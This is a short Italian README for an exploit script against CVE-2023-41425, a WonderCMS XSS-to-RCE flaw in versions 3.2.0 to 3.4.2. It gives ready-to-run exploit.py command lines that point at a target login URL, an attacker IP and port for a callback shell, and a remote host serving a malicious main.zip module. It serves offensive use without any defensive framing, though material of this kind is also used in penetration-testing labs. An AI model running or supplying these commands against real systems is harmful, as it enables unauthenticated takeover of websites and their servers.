
WonderCMS RCE CVE-2023-41425
Le versioni v3.2.0 fino a v3.4.2 di WonderCMS con vulnerabilità XSS permettono a un attore malintenzionato di ottenere RCE caricando un componente su installModule CVE-2023-41425 (Non è necessario conoscere la password).
Specificando l'host remoto da cui viene scaricato il file main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
OPPURE non specificando il file main.zip. Per impostazione predefinita, lo scarica da main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
